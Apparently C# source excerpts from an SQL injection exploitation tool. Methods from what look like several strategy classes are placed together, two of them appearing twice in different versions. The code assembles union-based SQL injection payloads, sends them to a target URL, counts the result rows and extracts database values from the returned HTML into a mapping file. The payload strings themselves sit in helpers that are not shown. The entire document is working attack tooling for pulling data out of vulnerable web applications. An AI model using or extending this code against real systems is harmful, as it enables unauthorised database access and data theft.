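/// <summary>
/// Fetches one row of the custom query through the union-based strategy and returns the
/// values that could be read back from the page, one per line.
/// </summary>
/// <param name="startingFrom">Row offset handed to the DBMS-specific limiter when the payload is
/// expected to return multiple rows; the j-th visible column requests row <c>startingFrom + j</c>,
/// so one request fetches several consecutive rows. Ignored for single-result payloads.</param>
/// <returns>The extracted values joined by <see cref="Environment.NewLine"/>; an empty string when
/// there is no payload to run or nothing could be parsed out of the response.</returns>
/// <remarks>
/// Every value returned (and written to the mapping file) is taken verbatim from the target's HTTP
/// response, i.e. it is target-controlled text and must be treated as untrusted by whatever renders
/// it. The original "@TODO: strip scripts" still stands — nothing here sanitises the value.
/// </remarks>
public string GetSingleCustomQueryResultRow(int startingFrom)
{
    // Same convention as GetTotalNoOfCustomQueryResultRows: with no payload there is nothing to run,
    // so return an empty result instead of failing on a null reference further down.
    if (PayloadDetails == null || string.IsNullOrEmpty(PayloadDetails.Payload))
    {
        return string.Empty;
    }

    string generatedPayload = PayloadDetails.Payload;
    if (PayloadDetails.Params != null)
    {
        // Positional "{n}" tokens are substituted one parameter at a time on the evolving string, so a
        // value that itself contains a later "{n}" token gets re-substituted. The values come from
        // PayloadHelpers.GetData (presumably earlier extraction results) — TODO confirm that is acceptable.
        foreach (var param in PayloadDetails.Params)
        {
            generatedPayload = generatedPayload.Replace("{" + param.Position + "}", PayloadHelpers.GetData(param.Name, this));
        }
    }

    bool multipleRows = PayloadDetails.ExpectedResultType == Enums.ExpectedResultType.Multiple;
    string limiter = multipleRows ? PayloadHelpers.GetSingleResultLimiter(PayloadDetails.Dbms) : null;

    // Build the column list of the UNION SELECT: every column that is known to be rendered carries
    // a tagged copy of the payload, every other column is just a numeric filler.
    var sbCurExploit = new StringBuilder();
    int visibleSlot = 0;
    for (int j = 0; j < _nrCols; j++)
    {
        if (_visibleColumnIndexes.Contains(j))
        {
            string columnPayload = multipleRows
                ? string.Format(limiter, generatedPayload, startingFrom + j)
                : generatedPayload;

            sbCurExploit.Append(GeneralPayloads.UnionBasedSelectCountedResultWrapperPart1);
            // The column tag is hex-encoded, presumably so that no quote characters appear in the
            // injected string — confirm against GeneralPayloads. Indexing _visibleColumnIndexes by
            // slot assumes the list is kept in ascending column order (TODO confirm).
            sbCurExploit.Append(UrlHelpers.HexEncodeValue(string.Format(GeneralPayloads.UnionBasedSelectCountedResultWrapperPart2, _visibleColumnIndexes[visibleSlot])));
            sbCurExploit.AppendFormat(GeneralPayloads.UnionBasedSelectCountedResultWrapperPart3, columnPayload);
            visibleSlot++;
        }
        else
        {
            // Append(int), not AppendFormat(j.ToString()): the filler is a value, not a format string.
            sbCurExploit.Append(j);
        }

        if (j < _nrCols - 1)
        {
            sbCurExploit.Append(',');
        }
    }

    // NOTE(review): ExploitDetails is null-checked below for Dbms but dereferenced here unguarded;
    // presumably it is always set once the strategy has been chosen — confirm with the caller.
    string query = QueryHelper.CreateQuery(Url, ExploitDetails.Exploit, sbCurExploit.ToString());
    string pageHtml = QueryRunner.GetPageHtml(query, UseProxy ? ProxyDetails : null);
    IList<string> resultsBatch = HtmlHelpers.GetMultipleAnswersFromHtml(pageHtml, query, ExploitDetails, DetailedExceptions);

    var sbResult = new StringBuilder();
    var columnsProcessed = new HashSet<int>();
    string separator = GeneralPayloads.UnionBasedResultSeparator;
    foreach (string singleResult in resultsBatch)
    {
        // Ordinal search: the separator is a fixed marker and the text is target-controlled, so a
        // culture-aware comparison (which may ignore some characters) is the wrong tool here.
        int separatorIndex = singleResult.IndexOf(separator, StringComparison.Ordinal);
        if (separatorIndex != -1)
        {
            int columnIndex;
            if (!int.TryParse(singleResult.Substring(0, separatorIndex),
                              System.Globalization.NumberStyles.Integer,
                              System.Globalization.CultureInfo.InvariantCulture,
                              out columnIndex))
            {
                continue;
            }
            // Keep only the first hit per column; Add returns false for a column already seen.
            if (!columnsProcessed.Add(columnIndex))
            {
                continue;
            }

            string actualValue = singleResult.Substring(separatorIndex + separator.Length);
            if (!string.IsNullOrEmpty(MappingFile))
            {
                XmlHelpers.SaveToMappingFile(MappingFile, PayloadDetails, actualValue, this,
                    ExploitDetails != null ? ExploitDetails.Dbms : string.Empty);
            }
            sbResult.Append(actualValue);
            sbResult.Append(Environment.NewLine);
        }

        // Stop as soon as every visible column has produced a value.
        if (columnsProcessed.Count == _visibleColumnIndexes.Count)
        {
            break;
        }
    }

    return sbResult.ToString();
}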
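/// <summary>
/// Asks the target how many rows the custom query yields, so the caller knows how many times to
/// call GetSingleCustomQueryResultRow.
/// </summary>
/// <returns>0 when there is no payload to run or the target's answer is not a non-negative integer;
/// 1 for single-result payloads (no request is sent); otherwise the count reported by the target.</returns>
/// <remarks>
/// The count is parsed out of the target's HTTP response and is therefore target-controlled; it is
/// only ever used as a loop bound by callers, so an unparsable or negative answer is reported as 0.
/// </remarks>
public int GetTotalNoOfCustomQueryResultRows()
{
    if (PayloadDetails == null || string.IsNullOrEmpty(PayloadDetails.Payload))
    {
        return 0;
    }
    if (PayloadDetails.ExpectedResultType == Enums.ExpectedResultType.Single)
    {
        return 1;
    }

    string generatedPayload = PayloadDetails.Payload;
    if (PayloadDetails.Params != null)
    {
        // Positional "{n}" tokens are substituted one parameter at a time on the evolving string
        // (same scheme as GetSingleCustomQueryResultRow).
        foreach (var param in PayloadDetails.Params)
        {
            generatedPayload = generatedPayload.Replace("{" + param.Position + "}", PayloadHelpers.GetData(param.Name, this));
        }
    }

    // The counting payload is sent as-is; the previous hex-encoding wrapper was left commented out
    // upstream, presumably because this strategy does not need it — confirm before re-adding it.
    generatedPayload = string.Format(GeneralPayloads.QueryResultCount, generatedPayload);

    string query = QueryHelper.CreateQuery(Url, ExploitDetails.Exploit, generatedPayload);
    string pageHtml = QueryRunner.GetPageHtml(query, UseProxy ? ProxyDetails : null);
    string countString = HtmlHelpers.GetAnswerFromHtml(pageHtml, query, ExploitDetails, DetailedExceptions);

    // Invariant parse of machine data; a response that is not a number counts as "no rows".
    int count;
    if (!int.TryParse(countString,
                      System.Globalization.NumberStyles.Integer,
                      System.Globalization.CultureInfo.InvariantCulture,
                      out count))
    {
        return 0;
    }
    return Math.Max(0, count);
}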
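/// <summary>
/// Asks the target how many rows the custom query yields, using a UNION SELECT whose rendered
/// column carries the counting payload.
/// </summary>
/// <returns>0 when there is no payload to run or the target's answer is not a non-negative integer;
/// 1 for single-result payloads (no request is sent); otherwise the count reported by the target.</returns>
/// <exception cref="SqlInjException">Thrown when the column layout is unknown and the probe
/// (TestIfVulnerable) cannot establish that the script is injectable with this strategy.</exception>
/// <remarks>
/// The count is parsed out of the target's HTTP response and is therefore target-controlled; it is
/// only ever used as a loop bound by callers, so an unparsable or negative answer is reported as 0.
/// </remarks>
public int GetTotalNoOfCustomQueryResultRows()
{
    // The column layout must be known before a union payload can be built; probe for it when
    // nothing has been established yet.
    if (_nrCols == 0 || _nrVisibleCols == 0 || !_visibleColumnIndexes.Any())
    {
        if (!TestIfVulnerable())
        {
            throw new SqlInjException("Given script is not injectable using current injection strategy");
        }
    }

    if (PayloadDetails == null || string.IsNullOrEmpty(PayloadDetails.Payload))
    {
        return 0;
    }
    if (PayloadDetails.ExpectedResultType == Enums.ExpectedResultType.Single)
    {
        return 1;
    }

    string generatedPayload = PayloadDetails.Payload;
    if (PayloadDetails.Params != null)
    {
        // Positional "{n}" tokens are substituted one parameter at a time on the evolving string
        // (same scheme as GetSingleCustomQueryResultRow).
        foreach (var param in PayloadDetails.Params)
        {
            generatedPayload = generatedPayload.Replace("{" + param.Position + "}", PayloadHelpers.GetData(param.Name, this));
        }
    }
    generatedPayload = string.Format(GeneralPayloads.QueryResultCount, generatedPayload);

    // Put the wrapped count into a column that is known to be rendered. The previous version always
    // used column 0, which yields nothing when column 0 is not echoed back by the page (compare the
    // per-visible-column placement in GetSingleCustomQueryResultRow). When the first visible column
    // is 0 the generated column list is unchanged.
    int columnCount = Math.Max(_nrCols, 1); // zero known columns still yields the wrapper alone, as before
    int wrapperColumn = _visibleColumnIndexes.Any() ? _visibleColumnIndexes.First() : 0;
    if (wrapperColumn < 0 || wrapperColumn >= columnCount)
    {
        wrapperColumn = 0;
    }

    var sbCurExploit = new StringBuilder();
    for (int j = 0; j < columnCount; j++)
    {
        if (j == wrapperColumn)
        {
            sbCurExploit.AppendFormat(GeneralPayloads.UnionBasedSelectResultWrapper, generatedPayload);
        }
        else
        {
            // Numeric filler for columns that are not used.
            sbCurExploit.Append(j);
        }
        if (j < columnCount - 1)
        {
            sbCurExploit.Append(',');
        }
    }

    string query = QueryHelper.CreateQuery(Url, ExploitDetails.Exploit, sbCurExploit.ToString());
    string pageHtml = QueryRunner.GetPageHtml(query, UseProxy ? ProxyDetails : null);
    string countString = HtmlHelpers.GetAnswerFromHtml(pageHtml, query, ExploitDetails, DetailedExceptions);

    // Invariant parse of machine data; a response that is not a number counts as "no rows".
    int count;
    if (!int.TryParse(countString,
                      System.Globalization.NumberStyles.Integer,
                      System.Globalization.CultureInfo.InvariantCulture,
                      out count))
    {
        return 0;
    }
    return Math.Max(0, count);
}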
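/// <summary>
/// Fetches one row of the custom query and returns the single value read back from the page.
/// </summary>
/// <param name="startingFrom">Row offset handed to the DBMS-specific limiter when the payload is
/// expected to return multiple rows; ignored for single-result payloads.</param>
/// <returns>The value HtmlHelpers.GetAnswerFromHtml extracted from the response, or an empty string
/// when there is no payload to run.</returns>
/// <remarks>
/// The returned value is taken verbatim from the target's HTTP response, i.e. it is target-controlled
/// text and must be treated as untrusted by whatever renders it. The original "@TODO: strip scripts"
/// still stands — nothing here sanitises the value before it is returned or written to the mapping file.
/// </remarks>
public string GetSingleCustomQueryResultRow(int startingFrom)
{
    // Same convention as GetTotalNoOfCustomQueryResultRows: with no payload there is nothing to run,
    // so return an empty result instead of failing on a null reference further down.
    if (PayloadDetails == null || string.IsNullOrEmpty(PayloadDetails.Payload))
    {
        return string.Empty;
    }

    string generatedPayload = PayloadDetails.Payload;
    if (PayloadDetails.Params != null)
    {
        // Positional "{n}" tokens are substituted one parameter at a time on the evolving string, so a
        // value that itself contains a later "{n}" token gets re-substituted. The values come from
        // PayloadHelpers.GetData (presumably earlier extraction results) — TODO confirm that is acceptable.
        foreach (var param in PayloadDetails.Params)
        {
            generatedPayload = generatedPayload.Replace("{" + param.Position + "}", PayloadHelpers.GetData(param.Name, this));
        }
    }

    if (PayloadDetails.ExpectedResultType == Enums.ExpectedResultType.Multiple)
    {
        // Restrict a multi-row payload to the single requested row.
        generatedPayload = string.Format(PayloadHelpers.GetSingleResultLimiter(PayloadDetails.Dbms), generatedPayload, startingFrom);
    }

    // NOTE(review): ExploitDetails is null-checked below for Dbms but dereferenced here unguarded;
    // presumably it is always set once the strategy has been chosen — confirm with the caller.
    string query = QueryHelper.CreateQuery(Url, ExploitDetails.Exploit, generatedPayload);
    string pageHtml = QueryRunner.GetPageHtml(query, UseProxy ? ProxyDetails : null);
    string result = HtmlHelpers.GetAnswerFromHtml(pageHtml, query, ExploitDetails, DetailedExceptions);

    // Only non-empty answers are persisted (unlike the union-based variant, which saves every hit).
    if (!string.IsNullOrEmpty(MappingFile) && !string.IsNullOrEmpty(result))
    {
        XmlHelpers.SaveToMappingFile(MappingFile, PayloadDetails, result, this,
            ExploitDetails != null ? ExploitDetails.Dbms : string.Empty);
    }
    return result;
}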